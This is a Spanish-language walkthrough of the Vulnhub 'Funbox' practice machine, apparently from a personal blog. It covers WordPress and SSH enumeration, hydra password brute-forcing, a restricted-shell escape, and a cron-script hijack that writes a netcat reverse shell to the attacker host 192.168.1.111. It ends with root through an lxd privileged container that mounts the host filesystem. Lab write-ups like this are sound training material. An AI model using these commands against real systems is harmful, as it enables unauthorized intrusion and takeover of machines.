LaCashita!

[VULNHUB] Funbox

Hoy vamos a hackear la maquina de Vulnhub llamada Funbox.Podeis descargarla desde el siguiente enlace: Funbox

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.


Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 09:27 CEST
Nmap scan report for funbox.home (192.168.1.67)
Host is up (0.016s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     ProFTPD
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/secret/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, 
X11Probe, afp: 
|     Invalid message"
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, 
please submit the following fingerprint at 
https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.80%I=7%D=7/28%Time=5F1FD36D%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.74 seconds

Vemos que apache hace referencia a http://funbox.fritz.box asi que agregamos a /etc/hosts la siguiente linea: 192.168.1.67 funbox.fritz.box Al visitar la pagina vemos que se trata de Wordpress. Usamos wpscan para ver si tiene alguna vulnerabilidad y enumerar usuarios.


~ > wpscan --url "http://funbox.fritz.box/" --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ Â®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.2
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://funbox.fritz.box/ [192.168.1.67]
[+] Started: Tue Jul 28 09:35:30 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://funbox.fritz.box/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://funbox.fritz.box/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - 
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce
ss

[+] http://funbox.fritz.box/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: 
http://funbox.fritz.box/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: 
http://funbox.fritz.box/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://funbox.fritz.box/index.php/feed/, 
https://wordpress.org/?v=5.4.2
 |  - http://funbox.fritz.box/index.php/comments/feed/, 
https://wordpress.org/?v=5.4.2

[+] WordPress theme in use: twentyseventeen
 | Location: http://funbox.fritz.box/wp-content/themes/twentyseventeen/
 | Latest Version: 2.3 (up to date)
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://funbox.fritz.box/wp-content/themes/twentyseventeen/readme.txt
 | Style URL: 
http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and 
immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - 
http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507
, Match: 'Version: 2.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========> (10 / 10) 100.00% Time: 
00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - 
http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] joe
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been 
output.
[!] You can get a free API token with 50 daily requests by registering at 
https://wpvulndb.com/users/sign_up

[+] Finished: Tue Jul 28 09:35:35 2020
[+] Requests Done: 26
[+] Cached Requests: 36
[+] Data Sent: 6.525 KB
[+] Data Received: 257.882 KB
[+] Memory used: 159.355 MB
[+] Elapsed time: 00:00:04

Vemos que encuentra los usuarios admin y joe. Hacemos bruteforce a ssh, con el usuario joe y el diccionario rockyou.txt


~ > hydra -l joe -P rockyou.txt 192.168.1.67 ssh -I
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-04 
14:54:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is 
recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent 
overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries 
(l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.1.67:22/
[22][ssh] host: 192.168.1.67   login: joe   password: 12345

Encontramos la password para joe, es 12345. Nos logueamos por ssh!

Low Shell


~ > ssh joe@192.168.1.67
joe@192.168.1.67's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 1.0

 * "If you've been waiting for the perfect Kubernetes dev solution for
   macOS, the wait is over. Learn how to install Microk8s on macOS."

   https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/

33 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

You have mail.
Last login: Sat Jul 18 10:02:39 2020 from 192.168.178.143
joe@funbox:~$

Al entrar vemos que estamos en una restricted shell. Si miramos el .bash_history de joe podemos ver una forma de escapar:


ssh joe@funbox -t "bash --noprofile"

Sabiendo esto, volvemos a conectarnos por ssh pero evadiendo la restricted shell.


~ > ssh joe@192.168.1.67 -t "bash --noprofile"
joe@192.168.1.67's password:

Una vez dentro, nos descargamos pspy64 desde nuestro equipo para ver si se ejecuta alguna tarea programada que nos interese. Descargamos pspy64.


joe@funbox:/tmp$ wget http://192.168.1.111/pspy64
--2020-08-05 08:21:16--  http://192.168.1.111/pspy64
Connecting to 192.168.1.111:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: â€˜pspy64â€™

pspy64                100%[=========================>]   2.94M  --.-KB/s    in 
0.02s   

2020-08-05 08:21:16 (126 MB/s) - â€˜pspy64â€™ saved [3078592/3078592]

Damos permisos de ejecucion.


joe@funbox:/tmp$ chmod +x pspy64

Y por ultimos ejecutamos.


joe@funbox:/tmp$ ./pspy64
---SNIP---
2020/08/05 08:22:01 CMD: UID=1000 PID=2699   | /bin/bash /home/funny/.backup.s
---SNIP---

Podemos ver que hay una tarea programada que ejecuta un script. 2020/08/05 08:22:01 CMD: UID=1000 PID=2699 | /bin/bash /home/funny/.backup.s Miramos los permisos del fichero para ver si podemos modificarlo.


joe@funbox:/tmp$ ls -l /home/funny/.backup.sh
-rwxrwxrwx 1 funny funny 55 Jul 18 10:15 /home/funny/.backup.sh

Tenemos permisos :) Nos descargamos nc en la maquina.


joe@funbox:/tmp$ wget http://192.168.1.111/nc
--2020-08-06 07:04:53--  http://192.168.1.111/nc
Connecting to 192.168.1.111:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 35520 (35K) [application/octet-stream]
Saving to: â€˜ncâ€™

nc                    100%[=========================>]  34.69K  --.-KB/s    in 
0s      

2020-08-06 07:04:53 (161 MB/s) - â€˜ncâ€™ saved [35520/35520]

Le damos permisos de ejecucion.


joe@funbox:/tmp$ chmod +x nc

Editamos el script y usamos nc para obtener una reverse shell.


joe@funbox:/tmp$ cat /home/funny/.backup.sh
#!/bin/bash
/tmp/nc -e /bin/bash 192.168.1.111 5555

Ponemos pwncat a la escucha:


~ > pwncat -l -p 5555
[19:17:20] received connection from 192.168.1.67:54048                    
connect.py:148
[19:17:21] new host w/ hash eb16a4311e0222952063c0182d5d9541               
victim.py:329
           pwncat running in /usr/bin/bash                                 
victim.py:363
           pwncat is ready

Privilege Escalation

Ahora ya tenemos los privilegios de funny. Vemos que funny esta en el grupo de lxd. Buscamos donde se encuentra el ejecutable "lxd".


funny@funbox:/$ find / -name lxd 2>/dev/null
/var/snap/lxd
/var/snap/lxd/common/lxd
/snap/bin/lxd
/snap/lxd
/snap/lxd/16100/bin/lxd
/snap/lxd/16100/commands/lxd
/snap/lxd/16530/bin/lxd
/snap/lxd/16530/commands/lxd
funny@funbox:/$

Modificamos el PATH para agregar la carpeta donde se encuentra el ejecutable de lxd.


funny@funbox:/$ export PATH=/snap/bin:$PATH

Empezamos la escalada de privilegios ejecutando lxd init. Para ello deberemos crear un container, y montar la raiz del host en alguna carpeta del container, de ese modo, al ser root en el container podremos ver todo el contenido de la carpeta montada, es decir, tendremos acceso a todo el FS del host.


funny@funbox:/$ lxd init

Dejamos el resto de valores por defecto.


Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (dir, lvm, ceph, btrfs) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty disk or partition? (yes/no) 
[default=no]: 
Size in GB of the new loop device (1GB minimum) [default=5GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, â€œautoâ€ or 
â€œnoneâ€) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, â€œautoâ€ or 
â€œnoneâ€) [default=auto]: 
Would you like LXD to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) 
[default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:

Creamos el container.


funny@funbox:/tmp$ lxc init ubuntu:16.04 test -c security.privileged=true
Creating test
funny@funbox:/tmp$ lxc config device add test whatever disk source=/ 
path=/mnt/root recursive=true
Device whatever added to test
funny@funbox:/tmp$ lxc start test
funny@funbox:/tmp$ lxc exec test bash

Por ultimo, dentro del container, buscamos la flag de root.

flag.txt


root@test:~# cd /mnt/root/root
root@test:/mnt/root/root# ls
flag.txt  mbox  snap
root@test:/mnt/root/root# cat flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2

End

Y con esto ya seriamos root de la maquina.